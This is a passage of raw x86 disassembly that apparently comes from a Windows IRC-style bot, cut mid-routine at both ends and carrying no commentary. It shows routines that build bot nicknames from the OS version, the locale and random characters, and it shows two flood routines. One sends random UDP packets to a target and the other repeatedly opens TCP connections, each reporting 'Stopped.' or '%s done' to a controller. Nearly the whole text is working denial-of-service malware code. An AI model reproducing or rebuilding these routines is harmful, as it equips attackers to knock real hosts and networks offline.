sub esp, 98h
push ebx
push esi
push edi
xor esi, esi
push 10h
mov edi, offset byte_4544DC
push esi
push edi
mov ebx, ecx
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_98]
mov [ebp+var_98], 94h
push eax
call dword_42F044 ; GetVersionExA
test eax, eax
jz loc_410A7D
cmp [ebp+var_94], 4
jnz short loc_410A2F
cmp [ebp+var_90], esi
jnz short loc_410A0F
cmp [ebp+var_88], 1
mov eax, offset a95 ; "95"
jz short loc_4109FF
mov eax, [ebp+var_4]
loc_4109FF: ; CODE XREF: sub_41099D+5D�j
cmp [ebp+var_88], 2
jnz short loc_410A82
mov eax, offset aNt ; "NT"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A0F: ; CODE XREF: sub_41099D+4F�j
cmp [ebp+var_90], 0Ah
jnz short loc_410A1F
mov eax, offset a98 ; "98"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A1F: ; CODE XREF: sub_41099D+79�j
cmp [ebp+var_90], 5Ah
jnz short loc_410A7D
mov eax, offset aMe ; "ME"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A2F: ; CODE XREF: sub_41099D+47�j
cmp [ebp+var_94], 5
jnz short loc_410A67
cmp [ebp+var_90], esi
jnz short loc_410A47
mov eax, offset a2k ; "2K"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A47: ; CODE XREF: sub_41099D+A1�j
cmp [ebp+var_90], 1
jnz short loc_410A57
mov eax, offset aXp ; "XP"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A57: ; CODE XREF: sub_41099D+B1�j
cmp [ebp+var_90], 2
jnz short loc_410A7D
mov eax, offset a2k3 ; "2K3"
jmp short loc_410A82
; ---------------------------------------------------------------------------
loc_410A67: ; CODE XREF: sub_41099D+99�j
cmp [ebp+var_94], 6
jnz short loc_410A7D
cmp [ebp+var_90], esi
mov eax, offset aVista ; "Vista"
jz short loc_410A82
loc_410A7D: ; CODE XREF: sub_41099D+3A�j
; sub_41099D+89�j ...
mov eax, offset off_4388B8
loc_410A82: ; CODE XREF: sub_41099D+69�j
; sub_41099D+70�j ...
push eax
push edi
call sub_422063
push edi
call sub_422120
add esp, 0Ch
mov esi, eax
jmp short loc_410AAB
; ---------------------------------------------------------------------------
loc_410A96: ; CODE XREF: sub_41099D+111�j
call sub_4220FC
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_4544DC[esi], dl
inc esi
loc_410AAB: ; CODE XREF: sub_41099D+F7�j
cmp esi, [ebx+2Ch]
jle short loc_410A96
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41099D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410AB7 proc near ; CODE XREF: sub_410806+1B�p
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_98 = dword ptr -98h
var_14 = byte ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0A8h
push ebx
push esi
push edi
xor edi, edi
push 10h
mov esi, offset dword_4544EC
push edi
push esi
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push 7
push 800h
call dword_42F080 ; GetLocaleInfoA
lea eax, [ebp+var_A8]
mov [ebp+var_A8], 94h
push eax
call dword_42F044 ; GetVersionExA
push 0Ah
test eax, eax
pop ebx
jz loc_410BAA
cmp [ebp+var_A4], 4
jnz short loc_410B5C
cmp [ebp+var_A0], edi
jnz short loc_410B3D
cmp [ebp+var_98], 1
mov edi, offset a95 ; "95"
jz short loc_410B2D
mov edi, [ebp+var_4]
loc_410B2D: ; CODE XREF: sub_410AB7+71�j
cmp [ebp+var_98], 2
jnz short loc_410BAF
mov edi, offset aNt ; "NT"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B3D: ; CODE XREF: sub_410AB7+63�j
cmp [ebp+var_A0], ebx
jnz short loc_410B4C
mov edi, offset a98 ; "98"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B4C: ; CODE XREF: sub_410AB7+8C�j
cmp [ebp+var_A0], 5Ah
jnz short loc_410BAA
mov edi, offset aMe ; "ME"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B5C: ; CODE XREF: sub_410AB7+5B�j
cmp [ebp+var_A4], 5
jnz short loc_410B94
cmp [ebp+var_A0], edi
jnz short loc_410B74
mov edi, offset a2k ; "2K"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B74: ; CODE XREF: sub_410AB7+B4�j
cmp [ebp+var_A0], 1
jnz short loc_410B84
mov edi, offset aXp ; "XP"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B84: ; CODE XREF: sub_410AB7+C4�j
cmp [ebp+var_A0], 2
jnz short loc_410BAA
mov edi, offset a2k3 ; "2K3"
jmp short loc_410BAF
; ---------------------------------------------------------------------------
loc_410B94: ; CODE XREF: sub_410AB7+AC�j
cmp [ebp+var_A4], 6
jnz short loc_410BAA
cmp [ebp+var_A0], edi
mov edi, offset aVista ; "Vista"
jz short loc_410BAF
loc_410BAA: ; CODE XREF: sub_410AB7+4E�j
; sub_410AB7+9C�j ...
mov edi, offset off_4388B8
loc_410BAF: ; CODE XREF: sub_410AB7+7D�j
; sub_410AB7+84�j ...
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
add edx, 30h
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
add edx, 30h
push edx
call sub_4220FC
cdq
idiv ebx
lea eax, [ebp+var_14]
add edx, 30h
push edx
push edi
push eax
push offset aSSCCC ; "%s|%s|%c%c%c"
push esi
call sub_422063
add esp, 1Ch
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_410AB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BF1 proc near ; CODE XREF: sub_410806+44�p
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_2 = byte ptr -2
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 10h
mov esi, offset dword_4544FC
push ebx
push esi
mov edi, ecx
call sub_4221F0
add esp, 0Ch
mov ecx, edi
mov [edi+34h], ebx
mov [edi+38h], ebx
mov [edi+3Ch], ebx
call sub_41101E
mov [ebp+var_8], eax
lea eax, [ebp+var_18]
push 10h
push eax
push 7
push 800h
call dword_42F080 ; GetLocaleInfoA
push [ebp+var_8]
push esi
call sub_423270
lea eax, [ebp+var_18]
push eax
push esi
call sub_423270
push offset asc_4388F4 ; "|"
push esi
call sub_423270
xor eax, eax
add esp, 18h
inc eax
cmp [edi+34h], ebx
jz short loc_410C61
push 2
pop eax
loc_410C61: ; CODE XREF: sub_410BF1+6B�j
cmp [edi+38h], ebx
jz short loc_410C67
inc eax
loc_410C67: ; CODE XREF: sub_410BF1+73�j
cmp [edi+3Ch], ebx
jz short loc_410C6D
inc eax
loc_410C6D: ; CODE XREF: sub_410BF1+79�j
push 5
pop edi
cmp eax, edi
jge short loc_410CA0
sub edi, eax
loc_410C76: ; CODE XREF: sub_410BF1+AD�j
call sub_4220FC
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_2]
push edx
push offset aI_1 ; "%i"
push eax
call sub_422063
lea eax, [ebp+var_2]
push eax
push esi
call sub_423270
add esp, 14h
dec edi
jnz short loc_410C76
loc_410CA0: ; CODE XREF: sub_410BF1+81�j
push offset asc_4388F4 ; "|"
push esi
call sub_423270
pop ecx
mov eax, esi
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_410BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CB4 proc near ; CODE XREF: sub_410806+50�p
var_4C = byte ptr -4Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_454488
push 0
push ebx
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
mov [ebp+var_C], eax
call sub_4220FC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
cdq
pop ecx
lea edi, [ebp+var_4C]
idiv ecx
push 10h
pop ecx
rep movsd
add dl, 61h
mov [ebp+var_8], dl
call sub_4220FC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_7], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_6], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_5], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_4], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_3], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_2], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_1], al
call sub_4220FC
cdq
idiv esi
mov dl, [ebp+edx+var_4C]
movsx eax, dl
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
jbe short loc_410DCA
push [ebp+var_C]
push offset aDCCCCCCCCC ; "|%d|%c%c%c%c%c%c%c%c%c"
push ebx
call sub_422063
add esp, 30h
jmp short loc_410DD8
; ---------------------------------------------------------------------------
loc_410DCA: ; CODE XREF: sub_410CB4+101�j
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_422063
add esp, 2Ch
loc_410DD8: ; CODE XREF: sub_410CB4+114�j
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_410CB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410DDF proc near ; CODE XREF: sub_410806+5C�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_4544BC
push 0
push ebx
mov [ebp+var_14], ecx
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
mov ecx, [ebp+var_14]
mov [ebp+var_C], eax
call sub_4110B0
mov [ebp+var_10], eax
call sub_4220FC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
cdq
pop ecx
lea edi, [ebp+var_54]
idiv ecx
push 10h
pop ecx
rep movsd
add dl, 61h
mov [ebp+var_8], dl
call sub_4220FC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_7], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_6], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_5], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_4], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_3], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_2], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_1], al
call sub_4220FC
cdq
idiv esi
mov dl, [ebp+edx+var_54]
movsx eax, dl
push eax
movsx eax, [ebp+var_1]
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push [ebp+var_10]
jbe short loc_410F06
push [ebp+var_C]
push offset aDSCCCCCCCCC ; "|%d|%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_422063
add esp, 34h
jmp short loc_410F14
; ---------------------------------------------------------------------------
loc_410F06: ; CODE XREF: sub_410DDF+112�j
push offset aSCCCCCCCCC ; "%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_422063
add esp, 30h
loc_410F14: ; CODE XREF: sub_410DDF+125�j
mov ecx, [ebp+var_14]
call sub_41101E
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_410DDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F23 proc near ; CODE XREF: sub_410806+68�p
var_48 = byte ptr -48h
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_454498
push 0
push ebx
call sub_4221F0
call sub_4220FC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
cdq
pop ecx
lea edi, [ebp+var_48]
idiv ecx
push 10h
pop ecx
rep movsd
add dl, 61h
mov [ebp+var_8], dl
call sub_4220FC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_7], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_6], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_5], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_4], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_3], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_2], al
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_1], al
call sub_4220FC
cdq
idiv esi
movsx eax, [ebp+edx+var_48]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_422063
add esp, 38h
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_410F23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41101E proc near ; CODE XREF: sub_410BF1+29�p
; sub_410DDF+138�p
var_C = byte ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
push 10h
mov esi, offset dword_454458
push 0
push esi
mov ebx, ecx
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
mov edi, offset asc_4388F4 ; "|"
push edi
push esi
mov [ebp+var_4], eax
call sub_422063
push offset dword_455388
call sub_414173
add esp, 0Ch
test eax, eax
jz short loc_41107E
push offset aP_3 ; "P"
push esi
mov dword ptr [ebx+38h], 1
call sub_423270
pop ecx
pop ecx
loc_41107E: ; CODE XREF: sub_41101E+4A�j
push [ebp+var_4]
lea eax, [ebp+var_C]
push offset a_2d ; "%.2d"
push eax
call sub_422063
mov eax, [ebp+var_4]
mov [ebx+30h], eax
lea eax, [ebp+var_C]
push eax
push esi
call sub_423270
push edi
push esi
call sub_423270
add esp, 1Ch
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41101E endp
; =============== S U B R O U T I N E =======================================
sub_4110B0 proc near ; CODE XREF: sub_410DDF+33�p
push esi
push edi
push 10h
mov esi, offset dword_454468
push 0
push esi
mov edi, ecx
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
push offset dword_455388
call sub_414173
test eax, eax
pop ecx
jz short loc_4110EF
push offset aP ; "P|"
push esi
mov dword ptr [edi+38h], 1
call sub_423270
pop ecx
pop ecx
loc_4110EF: ; CODE XREF: sub_4110B0+29�j
mov eax, esi
pop edi
pop esi
retn
sub_4110B0 endp
; =============== S U B R O U T I N E =======================================
sub_4110F4 proc near ; CODE XREF: sub_403B2C+18EC�p
; sub_41A1AB+12�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_4110FF
xor eax, eax
inc eax
jmp short locret_411118
; ---------------------------------------------------------------------------
loc_4110FF: ; CODE XREF: sub_4110F4+4�j
push [esp+arg_0]
push offset dword_43C088
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_40FBDB
add esp, 14h
locret_411118: ; CODE XREF: sub_4110F4+9�j
retn 4
sub_4110F4 endp
; =============== S U B R O U T I N E =======================================
sub_41111B proc near ; CODE XREF: sub_403B2C+6ED�p
; sub_403B2C+1B0C�p ...
mov eax, [ecx+8]
retn
sub_41111B endp
; =============== S U B R O U T I N E =======================================
sub_41111F proc near ; CODE XREF: sub_403B2C+70A�p
; sub_40D7ED+8�p ...
mov eax, [ecx+0Ch]
retn
sub_41111F endp
; =============== S U B R O U T I N E =======================================
sub_411123 proc near ; CODE XREF: sub_412267+4AC�p
; sub_415A65+32F�p ...
mov al, [ecx+4]
retn
sub_411123 endp
; =============== S U B R O U T I N E =======================================
sub_411127 proc near ; CODE XREF: sub_412267+541�p
mov al, [ecx+5]
retn
sub_411127 endp
; =============== S U B R O U T I N E =======================================
sub_41112B proc near ; CODE XREF: sub_403B2C+4544�p
; sub_403B2C+6ED3�p
mov eax, [ecx]
retn
sub_41112B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41112E proc near ; DATA XREF: sub_403B2C+519A�o
var_154 = dword ptr -154h
var_14C = byte ptr -14Ch
var_CC = byte ptr -0CCh
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 154h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_154]
rep movsd
mov dword ptr [eax+12Ch], 1
mov eax, [ebp+var_154]
xor ebx, ebx
mov [ebp+arg_0], eax
push ebx
mov [ebp+var_4], ebx
call sub_4241D4
push 32h
mov [ebp+var_C], eax
call sub_422F79
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz loc_4112A0
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_CC]
push eax
call dword_42F2AC ; inet_addr
push [ebp+var_40]
mov [ebp+var_20], eax
mov [ebp+var_24], 2
call dword_42F2B8 ; ntohs
mov esi, dword_42F298
mov [ebp+var_22], ax
loc_4111B7: ; CODE XREF: sub_41112E+145�j
cmp [ebp+var_40], ebx
jnz short loc_4111C5
call sub_4220FC
mov [ebp+var_22], ax
loc_4111C5: ; CODE XREF: sub_41112E+8C�j
push 11h
push 2
push 2
call dword_42F29C ; socket
mov edi, eax
cmp edi, ebx
mov [ebp+var_10], edi
jl loc_411278
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_41120B
push offset aStopped_ ; "Stopped."
push 8
push ebx
push ebx
push [ebp+var_34]
lea eax, [ebp+var_14C]
push [ebp+var_30]
push [ebp+arg_0]
push eax
call sub_41C090
add esp, 20h
loc_41120B: ; CODE XREF: sub_41112E+BA�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 1
push eax
push 8004667Eh
push edi
call dword_42F2B0 ; ioctlsocket
loc_411222: ; CODE XREF: sub_41112E+103�j
call sub_4220FC
mov ecx, [ebp+var_8]
mov [ebx+ecx], al
inc ebx
cmp ebx, 32h
jb short loc_411222
lea eax, [ebp+var_24]
push 10h
xor ebx, ebx
push eax
push ebx
push 32h
push ecx
push edi
call dword_42F2A4 ; sendto
push edi
call esi ; dword_42F298
cmp [ebp+var_4], 32h
jb short loc_411265
push ebx
call sub_4241D4
mov edx, [ebp+var_C]
pop ecx
mov ecx, [ebp+var_3C]
add ecx, edx
cmp eax, ecx
jge short loc_4112A9
mov [ebp+var_4], ebx
loc_411265: ; CODE XREF: sub_41112E+11F�j
push [ebp+var_44]
inc [ebp+var_4]
call dword_42F15C ; Sleep
xor ebx, ebx
jmp loc_4111B7
; ---------------------------------------------------------------------------
loc_411278: ; CODE XREF: sub_41112E+AA�j
push edi
call esi ; dword_42F298
push [ebp+var_38]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_0]
push esi
call sub_41074B
mov ecx, [ebp+arg_0]
push offset dword_43963C
push esi
call sub_410720
loc_4112A0: ; CODE XREF: sub_41112E+4B�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4112A9: ; CODE XREF: sub_41112E+132�j
cmp [ebp+var_30], 0
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
mov edi, offset aSDone ; "%s done"
jnz short loc_4112D3
cmp [ebp+var_34], 0
jnz short loc_4112D9
push ebx
lea eax, [ebp+var_14C]
push edi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
loc_4112D3: ; CODE XREF: sub_41112E+189�j
cmp [ebp+var_34], 0
jz short loc_4112ED
loc_4112D9: ; CODE XREF: sub_41112E+18F�j
push ebx
lea eax, [ebp+var_14C]
push edi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 10h
loc_4112ED: ; CODE XREF: sub_41112E+1A9�j
push [ebp+var_8]
call sub_4230B3
pop ecx
push [ebp+var_10]
call esi ; dword_42F298
push [ebp+var_38]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_41112E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41130C proc near ; DATA XREF: sub_403B2C+5373�o
var_150 = dword ptr -150h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 150h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov ebx, [ebp+var_150]
xor esi, esi
push esi
mov dword ptr [eax+12Ch], 1
mov [ebp+var_4], ebx
mov [ebp+arg_0], esi
call sub_4241D4
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_4221F0
add esp, 10h
lea eax, [ebp+var_C8]
push eax
call dword_42F2AC ; inet_addr
push [ebp+var_3C]
mov [ebp+var_1C], eax
mov [ebp+var_20], 2
call dword_42F2B8 ; ntohs
mov esi, dword_42F298
mov [ebp+var_1E], ax
loc_411381: ; CODE XREF: sub_41130C+11B�j
cmp [ebp+var_3C], 0
jnz short loc_411390
call sub_4220FC
mov [ebp+var_1E], ax
loc_411390: ; CODE XREF: sub_41130C+79�j
push 6
push 1
push 2
call dword_42F29C ; socket
mov edi, eax
test edi, edi
mov [ebp+var_C], edi
jl loc_41142C
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_4113D6
push offset aStopped_ ; "Stopped."
push 8
push 0
push 0
push [ebp+var_30]
lea eax, [ebp+var_148]
push [ebp+var_2C]
push ebx
push eax
call sub_41C090
add esp, 20h
loc_4113D6: ; CODE XREF: sub_41130C+A7�j
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
push 8004667Eh
push edi
call dword_42F2B0 ; ioctlsocket
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_42F294 ; connect
push edi
call esi ; dword_42F298
cmp [ebp+arg_0], 32h
jl short loc_41141B
push 0
call sub_4241D4
mov edx, [ebp+var_8]
pop ecx
mov ecx, [ebp+var_38]
add ecx, edx
cmp eax, ecx
jge short loc_41145B
and [ebp+arg_0], 0
loc_41141B: ; CODE XREF: sub_41130C+F5�j
push [ebp+var_40]
inc [ebp+arg_0]
call dword_42F15C ; Sleep
jmp loc_411381
; ---------------------------------------------------------------------------
loc_41142C: ; CODE XREF: sub_41130C+97�j
push edi
call esi ; dword_42F298
push [ebp+var_34]
call sub_41C059
pop ecx
mov esi, offset dword_439638
push esi
mov ecx, ebx
call sub_41074B
push offset dword_43963C
push esi
mov ecx, ebx
call sub_410720
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41145B: ; CODE XREF: sub_41130C+109�j
cmp [ebp+var_2C], 0
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
mov edi, offset aSDone ; "%s done"
jnz short loc_411485
cmp [ebp+var_30], 0
jnz short loc_41148B
push ebx
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+var_4]
call sub_4104F6
add esp, 10h
loc_411485: ; CODE XREF: sub_41130C+15D�j
cmp [ebp+var_30], 0
jz short loc_41149F
loc_41148B: ; CODE XREF: sub_41130C+163�j
push ebx
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+var_4]
call sub_410491
add esp, 10h
loc_41149F: ; CODE XREF: sub_41130C+17D�j
push [ebp+var_C]
call esi ; dword_42F298
push [ebp+var_34]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_41130C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114B5 proc near ; DATA XREF: sub_403B2C+5523�o
var_250 = dword ptr -250h
var_248 = byte ptr -248h
var_1C8 = byte ptr -1C8h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = word ptr -116h
var_114 = byte ptr -114h
var_E8 = byte ptr -0E8h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = dword ptr -0D0h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = byte ptr -68h
var_67 = byte ptr -67h
var_66 = word ptr -66h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_30 = byte ptr -30h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 250h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_250]
